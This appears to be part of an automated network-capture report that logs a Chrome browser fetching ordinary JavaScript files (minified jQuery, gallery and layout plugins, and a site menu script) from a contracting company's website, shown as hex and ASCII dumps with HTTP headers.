                                              2024-09-27 06:19:43 UTC8000INData Raw: 20 30 29 2c 74 29 6b 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 45 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 67 75 69 64 3d 61 2e 67 75 69
                                              Data Ascii: 0),t)ke(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Ee;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,arguments)}).guid=a.gui
                                              2024-09-27 06:19:43 UTC8000INData Raw: 6e 2c 72 2c 69 2c 6f 29 7b 72 3d 67 28 72 29 3b 76 61 72 20 65 2c 74 2c 61 2c 73 2c 75 2c 6c 2c 63 3d 30 2c 66 3d 6e 2e 6c 65 6e 67 74 68 2c 70 3d 66 2d 31 2c 64 3d 72 5b 30 5d 2c 68 3d 6d 28 64 29 3b 69 66 28 68 7c 7c 31 3c 66 26 26 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 64 26 26 21 79 2e 63 68 65 63 6b 43 6c 6f 6e 65 26 26 44 65 2e 74 65 73 74 28 64 29 29 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 50 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29
                                              Data Ascii: n,r,i,o){r=g(r);var e,t,a,s,u,l,c=0,f=n.length,p=f-1,d=r[0],h=m(d);if(h||1<f&&"string"==typeof d&&!y.checkClone&&De.test(d))return n.each(function(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),Pe(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)
                                              2024-09-27 06:19:43 UTC8000INData Raw: 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c 5b 74 5d 3d 6e 29 29 7d 7d 2c 63 73 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 58 28 74 29 3b 72 65 74 75 72 6e 20 47 65 2e 74 65 73 74 28 74 29 7c 7c 28 74 3d 58 65 28 73 29 29 2c 28 61 3d 53 2e 63 73 73 48 6f 6f 6b 73 5b 74 5d 7c 7c 53 2e 63 73 73 48 6f 6f 6b 73 5b 73 5d 29 26 26 22 67 65 74 22 69 6e 20 61 26 26 28 69 3d 61 2e 67 65 74 28 65 2c 21 30 2c 6e 29 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 42 65 28 65 2c 74
                                              Data Ascii: ckground")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l[t]=n))}},css:function(e,t,n,r){var i,o,a,s=X(t);return Ge.test(t)||(t=Xe(s)),(a=S.cssHooks[t]||S.cssHooks[s])&&"get"in a&&(i=a.get(e,!0,n)),void 0===i&&(i=Be(e,t
                                              2024-09-27 06:19:43 UTC8000INData Raw: 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c 61 2c 5b 5d 29 2c 72 26 26 72 2e 73 74 6f 70 26 26 72 2e 73 74 6f 70 2e 63 61 6c 6c 28 74 68 69 73 2c 21 30 29 2c 65 3d 69 2e 6c 65 6e 67 74 68 3b 65 2d 2d 3b 29 69 5b 65 5d 2e 65 6c 65 6d 3d 3d 3d 74 68 69 73 26 26 69 5b 65 5d 2e 71 75 65 75 65 3d 3d 3d 61 26 26 28 69 5b 65 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 21 30 29 2c 69 2e 73 70 6c 69 63 65 28 65 2c 31 29 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 3b 65 2b 2b 29 6e 5b 65 5d 26 26 6e 5b 65 5d 2e 66 69 6e 69 73 68 26 26 6e 5b 65 5d 2e 66 69 6e 69 73 68 2e 63 61 6c 6c 28 74 68 69 73 29
                                              Data Ascii: r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,a,[]),r&&r.stop&&r.stop.call(this,!0),e=i.length;e--;)i[e].elem===this&&i[e].queue===a&&(i[e].anim.stop(!0),i.splice(e,1));for(e=0;e<o;e++)n[e]&&n[e].finish&&n[e].finish.call(this)
                                              2024-09-27 06:19:43 UTC8000INData Raw: 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 76 6f 69 64 20 30 2c 61 26 26 28 6e 5b 75 5d 3d 61 29 29 2c 65 2e 72 65 73 75 6c 74 7d 7d 2c 73 69 6d 75 6c 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 53 2e 65 78 74 65 6e 64 28 6e 65 77 20 53 2e 45 76 65 6e 74 2c 6e 2c 7b 74 79 70 65 3a 65 2c 69 73 53 69 6d 75 6c 61 74 65 64 3a 21 30 7d 29 3b 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 28 72 2c 6e 75 6c 6c 2c 74 29 7d 7d 29 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 74 72 69 67 67 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66
                                              Data Ascii: gationStopped()&&f.removeEventListener(d,wt),S.event.triggered=void 0,a&&(n[u]=a)),e.result}},simulate:function(e,t,n){var r=S.extend(new S.Event,n,{type:e,isSimulated:!0});S.event.trigger(r,null,t)}}),S.fn.extend({trigger:function(e,t){return this.each(f


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.465322173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:43 UTC619OUTGET /js/plugins.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:43 UTC274INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:43 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:20:48 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 250764
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:43 UTC7918INData Raw: 3b 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 6a 2e 63 73 73 54 65 78 74 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 79 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 78 28 70 72 65 66 69 78 65 73 2e 6a 6f 69 6e 28 61 2b 22 3b 22 29 2b 28 62 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 3d 3d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 61 29 2e 69 6e 64 65 78 4f 66 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 42 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 41 28 65 2c 22 2d 22 29 26 26 6a 5b 65 5d
                                              Data Ascii: ;window.Modernizr=function(a,b,c){function x(a){j.cssText=a}function y(a,b){return x(prefixes.join(a+";")+(b||""))}function z(a,b){return typeof a===b}function A(a,b){return!!~(""+a).indexOf(b)}function B(a,b){for(var d in a){var e=a[d];if(!A(e,"-")&&j[e]
                                              2024-09-27 06:19:43 UTC8000INData Raw: 7c 7c 28 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6e 29 2c 6d 28 63 2c 30 29 29 7d 7d 28 74 68 69 73 2c 64 6f 63 75 6d 65 6e 74 29 2c 4d 6f 64 65 72 6e 69 7a 72 2e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 65 70 6e 6f 70 65 2e 61 70 70 6c 79 28 77 69 6e 64 6f 77 2c 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 30 29 29 7d 3b 0a 20 0a 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 6a 73 77 69 6e 67 3d 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2e 73 77 69 6e 67 3b 6a 51 75 65 72 79 2e 65 78 74 65 6e 64 28 6a 51 75 65 72 79 2e 65 61 73 69 6e 67 2c 7b 64 65 66 3a 22 65 61 73 65 4f 75 74 51 75 61 64 22 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 61 2c 68 2c 67 29 7b 72 65 74
                                              Data Ascii: ||(n.parentNode.insertBefore(e,n),m(c,0))}}(this,document),Modernizr.load=function(){yepnope.apply(window,[].slice.call(arguments,0))}; jQuery.easing.jswing=jQuery.easing.swing;jQuery.extend(jQuery.easing,{def:"easeOutQuad",swing:function(e,f,a,h,g){ret
                                              2024-09-27 06:19:43 UTC8000INData Raw: 22 29 2c 74 68 69 73 2e 73 2e 73 68 6f 77 41 66 74 65 72 4c 6f 61 64 26 26 74 68 69 73 2e 24 6f 75 74 65 72 2e 61 64 64 43 6c 61 73 73 28 22 6c 67 2d 73 68 6f 77 2d 61 66 74 65 72 2d 6c 6f 61 64 22 29 2c 74 68 69 73 2e 64 6f 43 73 73 28 29 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 24 6f 75 74 65 72 2e 66 69 6e 64 28 22 2e 6c 67 2d 69 6e 6e 65 72 22 29 3b 69 2e 63 73 73 28 22 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 22 2c 74 68 69 73 2e 73 2e 63 73 73 45 61 73 69 6e 67 29 2c 69 2e 63 73 73 28 22 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 22 2c 74 68 69 73 2e 73 2e 73 70 65 65 64 2b 22 6d 73 22 29 7d 61 28 22 2e 6c 67 2d 62 61 63 6b 64 72 6f 70 22 29 2e 61 64 64 43 6c 61 73 73 28 22 69 6e 22 29 2c 73 65 74 54
                                              Data Ascii: "),this.s.showAfterLoad&&this.$outer.addClass("lg-show-after-load"),this.doCss()){var i=this.$outer.find(".lg-inner");i.css("transition-timing-function",this.s.cssEasing),i.css("transition-duration",this.s.speed+"ms")}a(".lg-backdrop").addClass("in"),setT
                                              2024-09-27 06:19:43 UTC8000INData Raw: 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 6c 67 2d 6c 65 66 74 2d 65 6e 64 22 29 7d 2c 34 30 30 29 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 50 72 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 74 68 69 73 2e 24 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 28 62 29 2e 6f 6e 28 22 6b 65 79 75 70 2e 6c 67 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 2e 24 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3e 31 26 26 28 33 37 3d 3d 3d 61 2e 6b 65 79 43 6f 64 65 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 63 2e 67 6f 54 6f 50 72 65 76 53 6c 69 64 65 28 29 29 2c 33 39 3d 3d 3d 61 2e 6b 65 79 43 6f 64 65 26 26 28 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 63 2e 67 6f 54 6f 4e 65 78 74 53 6c
                                              Data Ascii: removeClass("lg-left-end")},400)))},e.prototype.keyPress=function(){var c=this;this.$items.length>1&&a(b).on("keyup.lg",function(a){c.$items.length>1&&(37===a.keyCode&&(a.preventDefault(),c.goToPrevSlide()),39===a.keyCode&&(a.preventDefault(),c.goToNextSl
                                              2024-09-27 06:19:43 UTC8000INData Raw: 2e 6f 6e 28 22 64 62 6c 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 28 61 2c 64 2c 63 29 7d 29 2c 64 2e 6f 6e 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 68 3f 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 68 29 2c 68 3d 6e 75 6c 6c 2c 67 28 61 2c 64 2c 63 29 29 3a 68 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 3d 6e 75 6c 6c 7d 2c 33 30 30 29 2c 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 7d 29 2c 61 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 72 65 73 69 7a 65 2e 6c 67 2e 7a 6f 6f 6d 20 73 63 72 6f 6c 6c 2e 6c 67 2e 7a 6f 6f 6d 20 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 2e 6c 67 2e 7a 6f 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 70 61 67 65 58 3d 61
                                              Data Ascii: .on("dblclick",function(a){g(a,d,c)}),d.on("touchstart",function(a){h?(clearTimeout(h),h=null,g(a,d,c)):h=setTimeout(function(){h=null},300),a.preventDefault()})}),a(window).on("resize.lg.zoom scroll.lg.zoom orientationchange.lg.zoom",function(){b.pageX=a
                                              2024-09-27 06:19:43 UTC8000INData Raw: 28 63 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4d 61 6b 65 20 73 75 72 65 20 79 6f 75 20 68 61 76 65 20 69 6e 63 6c 75 64 65 64 20 76 69 64 65 6f 6a 73 22 29 7d 65 6c 73 65 20 64 2e 70 61 75 73 65 28 29 3b 76 61 72 20 6e 3b 6e 3d 6f 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 3f 6f 2e 63 6f 72 65 2e 73 2e 64 79 6e 61 6d 69 63 45 6c 5b 6c 5d 2e 73 72 63 3a 6f 2e 63 6f 72 65 2e 24 69 74 65 6d 73 2e 65 71 28 6c 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 7c 7c 6f 2e 63 6f 72 65 2e 24 69 74 65 6d 73 2e 65 71 28 6c 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 72 63 22 29 3b 76 61 72 20 6d 3d 6f 2e 63 6f 72 65 2e 69 73 56 69 64 65 6f 28 6e 2c 6c 29 7c 7c 7b 7d 3b 28 6d 2e 79 6f 75 74 75 62 65 7c 7c 6d 2e 76 69 6d 65 6f 7c 7c 6d 2e 64 61 69 6c 79 6d 6f 74
                                              Data Ascii: (c){console.error("Make sure you have included videojs")}else d.pause();var n;n=o.core.s.dynamic?o.core.s.dynamicEl[l].src:o.core.$items.eq(l).attr("href")||o.core.$items.eq(l).attr("data-src");var m=o.core.isVideo(n,l)||{};(m.youtube||m.vimeo||m.dailymot
                                              2024-09-27 06:19:43 UTC8000INData Raw: 66 6f 72 28 76 61 72 20 67 3d 66 2e 69 73 42 6f 72 64 65 72 42 6f 78 3d 21 28 21 6b 7c 7c 21 62 5b 6b 5d 7c 7c 22 62 6f 72 64 65 72 2d 62 6f 78 22 21 3d 3d 62 5b 6b 5d 29 2c 6d 3d 30 2c 6e 3d 68 2e 6c 65 6e 67 74 68 3b 6e 3e 6d 3b 6d 2b 2b 29 7b 76 61 72 20 6f 3d 68 5b 6d 5d 2c 70 3d 62 5b 6f 5d 3b 70 3d 69 28 61 2c 70 29 3b 76 61 72 20 71 3d 70 61 72 73 65 46 6c 6f 61 74 28 70 29 3b 66 5b 6f 5d 3d 69 73 4e 61 4e 28 71 29 3f 30 3a 71 7d 76 61 72 20 72 3d 66 2e 70 61 64 64 69 6e 67 4c 65 66 74 2b 66 2e 70 61 64 64 69 6e 67 52 69 67 68 74 2c 73 3d 66 2e 70 61 64 64 69 6e 67 54 6f 70 2b 66 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 2c 74 3d 66 2e 6d 61 72 67 69 6e 4c 65 66 74 2b 66 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 75 3d 66 2e 6d 61 72 67 69 6e 54 6f 70
                                              Data Ascii: for(var g=f.isBorderBox=!(!k||!b[k]||"border-box"!==b[k]),m=0,n=h.length;n>m;m++){var o=h[m],p=b[o];p=i(a,p);var q=parseFloat(p);f[o]=isNaN(q)?0:q}var r=f.paddingLeft+f.paddingRight,s=f.paddingTop+f.paddingBottom,t=f.marginLeft+f.marginRight,u=f.marginTop
                                              2024-09-27 06:19:43 UTC8000INData Raw: 70 61 72 73 65 49 6e 74 28 62 2c 31 30 29 2c 67 3d 65 3d 3d 3d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2e 78 26 26 66 3d 3d 3d 74 68 69 73 2e 70 6f 73 69 74 69 6f 6e 2e 79 3b 69 66 28 74 68 69 73 2e 73 65 74 50 6f 73 69 74 69 6f 6e 28 61 2c 62 29 2c 67 26 26 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 72 65 74 75 72 6e 20 76 6f 69 64 20 74 68 69 73 2e 6c 61 79 6f 75 74 50 6f 73 69 74 69 6f 6e 28 29 3b 76 61 72 20 68 3d 61 2d 63 2c 69 3d 62 2d 64 2c 6a 3d 7b 7d 3b 6a 2e 74 72 61 6e 73 66 6f 72 6d 3d 74 68 69 73 2e 67 65 74 54 72 61 6e 73 6c 61 74 65 28 68 2c 69 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 28 7b 74 6f 3a 6a 2c 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 68 69 73 2e 6c 61 79
                                              Data Ascii: parseInt(b,10),g=e===this.position.x&&f===this.position.y;if(this.setPosition(a,b),g&&!this.isTransitioning)return void this.layoutPosition();var h=a-c,i=b-d,j={};j.transform=this.getTranslate(h,i),this.transition({to:j,onTransitionEnd:{transform:this.lay
                                              2024-09-27 06:19:43 UTC8000INData Raw: 65 28 61 2c 64 29 7d 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 62 3f 5b 62 5d 2e 63 6f 6e 63 61 74 28 63 29 3a 63 3b 69 66 28 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 61 2c 64 29 2c 69 29 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 7c 7c 69 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 62 29 7b 76 61 72 20 65 3d 69 2e 45 76 65 6e 74 28 62 29 3b 65 2e 74 79 70 65 3d 61 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 65 2c 63 29 7d 65 6c 73 65 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 61 2c 63 29 7d 2c 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 67 6e 6f 72 65
                                              Data Ascii: e(a,d)}},g.prototype.dispatchEvent=function(a,b,c){var d=b?[b].concat(c):c;if(this.emitEvent(a,d),i)if(this.$element=this.$element||i(this.element),b){var e=i.Event(b);e.type=a,this.$element.trigger(e,c)}else this.$element.trigger(a,c)},g.prototype.ignore
                                              2024-09-27 06:19:43 UTC8000INData Raw: 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 63 3d 62 28 61 29 3b 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 57 69 64 74 68 3d 63 26 26 63 2e 69 6e 6e 65 72 57 69 64 74 68 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 67 65 74 49 74 65 6d 4c 61 79 6f 75 74 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 67 65 74 53 69 7a 65 28 29 3b 76 61 72 20 62 3d 61 2e 73 69 7a 65 2e 6f 75 74 65 72 57 69 64 74 68 25 74 68 69 73 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 2c 64 3d 62 26 26 31 3e 62 3f 22 72 6f 75 6e 64 22 3a 22 63 65 69 6c 22 2c 65 3d 4d 61 74 68 5b 64 5d 28 61 2e 73 69 7a 65 2e 6f 75 74 65 72 57 69 64 74 68 2f 74 68 69 73 2e 63 6f 6c 75 6d 6e 57 69 64 74 68 29 3b 65 3d 4d 61 74 68 2e 6d 69
                                              Data Ascii: element.parentNode:this.element,c=b(a);this.containerWidth=c&&c.innerWidth},d.prototype._getItemLayoutPosition=function(a){a.getSize();var b=a.size.outerWidth%this.columnWidth,d=b&&1>b?"round":"ceil",e=Math[d](a.size.outerWidth/this.columnWidth);e=Math.mi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.465323173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:19:43 UTC619OUTGET /js/scripts.js HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://www.citydiamondcontracting.com/contact
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:19:43 UTC273INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:19:43 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Mon, 16 Jan 2023 13:11:00 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 20031
                                              Connection: close
                                              Content-Type: application/javascript
                                              2024-09-27 06:19:43 UTC7919INData Raw: 0d 0a 0d 0a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 0d 0a 20 20 20 20 2f 2f 20 48 61 6d 62 75 72 67 65 72 20 6d 65 6e 75 0d 0a 20 20 20 20 69 66 28 65 2e 74 61 72 67 65 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 27 68 61 6d 62 75 72 67 65 72 2d 74 6f 67 67 6c 65 27 29 29 7b 0d 0a 20 20 20 20 20 20 65 2e 74 61 72 67 65 74 2e 63 68 69 6c 64 72 65 6e 5b 30 5d 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 27 61 63 74 69 76 65 27 29 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 7d 29 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 2f 2f 20 20 20 61 6c 6c 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 42 61 6c
                                              Data Ascii: document.addEventListener('click',function(e){ // Hamburger menu if(e.target.classList.contains('hamburger-toggle')){ e.target.children[0].classList.toggle('active'); } })// all ------------------function initBal
                                              2024-09-27 06:19:43 UTC8000INData Raw: 3a 20 22 62 75 74 74 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 6e 53 74 65 70 3a 20 66 75 6e 63 74 69 6f 6e 28 61 2c 20 62 2c 20 63 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 2e 65 6c 29 2e 66 69 6e 64 28 22 2e 70 65 72 63 65 6e 74 22 29 2e 74 65 78 74 28 4d 61 74 68 2e 72 6f 75 6e 64 28 63 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 7d 29 3b 0d 0a 09 2f 2f 20 20 20 73 68 61 72 65 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 20 20 20 20 76 61 72 20 72 20 3d 20 24 28 22 2e 73 68 61 72 65 2d 77 72 61 70 70 65 72 22 29 3b 0d 0a 20 20 20 20 66 75
                                              Data Ascii: : "butt", onStep: function(a, b, c) { $(this.el).find(".percent").text(Math.round(c)); } }); }); });// share------------------ var r = $(".share-wrapper"); fu
